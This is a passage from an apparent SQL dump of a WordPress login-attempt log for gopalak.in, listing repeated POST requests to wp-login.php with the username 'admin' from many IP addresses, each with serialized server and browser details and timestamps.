/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744940339.622463;s:12:\"REQUEST_TIME\";i:1744940339;}}','162.0.235.2',0,'2025-04-18 07:09:01','1970-01-01 00:00:00'),(93740,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49468\";s:11:\"REMOTE_ADDR\";s:12:\"209.74.67.29\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744940944.5191989;s:12:\"REQUEST_TIME\";i:1744940944;}}','209.74.67.29',0,'2025-04-18 07:19:06','1970-01-01 00:00:00'),(93741,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52516\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744941550.9320059;s:12:\"REQUEST_TIME\";i:1744941550;}}','103.179.190.244',0,'2025-04-18 07:29:12','1970-01-01 00:00:00'),(93742,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"95\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36178\";s:11:\"REMOTE_ADDR\";s:15:\"185.218.124.157\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744942186.1954219;s:12:\"REQUEST_TIME\";i:1744942186;}}','185.218.124.157',0,'2025-04-18 07:39:47','1970-01-01 00:00:00'),(93743,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34508\";s:11:\"REMOTE_ADDR\";s:13:\"182.43.230.63\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744942842.434216;s:12:\"REQUEST_TIME\";i:1744942842;}}','182.43.230.63',0,'2025-04-18 07:50:44','1970-01-01 00:00:00'),(93744,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38946\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.120.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744943486.9141281;s:12:\"REQUEST_TIME\";i:1744943486;}}','198.54.120.4',0,'2025-04-18 08:01:28','1970-01-01 00:00:00'),(93745,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47250\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744944136.2563441;s:12:\"REQUEST_TIME\";i:1744944136;}}','49.12.169.164',0,'2025-04-18 08:12:18','1970-01-01 00:00:00'),(93746,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40458\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.125.232\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744944785.493084;s:12:\"REQUEST_TIME\";i:1744944785;}}','198.54.125.232',0,'2025-04-18 08:23:07','1970-01-01 00:00:00'),(93747,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"13186\";s:11:\"REMOTE_ADDR\";s:14:\"20.245.238.242\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744945434.0144629;s:12:\"REQUEST_TIME\";i:1744945434;}}','20.245.238.242',0,'2025-04-18 08:33:55','1970-01-01 00:00:00'),(93748,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"36344\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744946093.218617;s:12:\"REQUEST_TIME\";i:1744946093;}}','94.23.61.165',0,'2025-04-18 08:44:55','1970-01-01 00:00:00'),(93749,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59438\";s:11:\"REMOTE_ADDR\";s:13:\"188.166.42.86\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744946765.1613331;s:12:\"REQUEST_TIME\";i:1744946765;}}','188.166.42.86',0,'2025-04-18 08:56:07','1970-01-01 00:00:00'),(93750,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 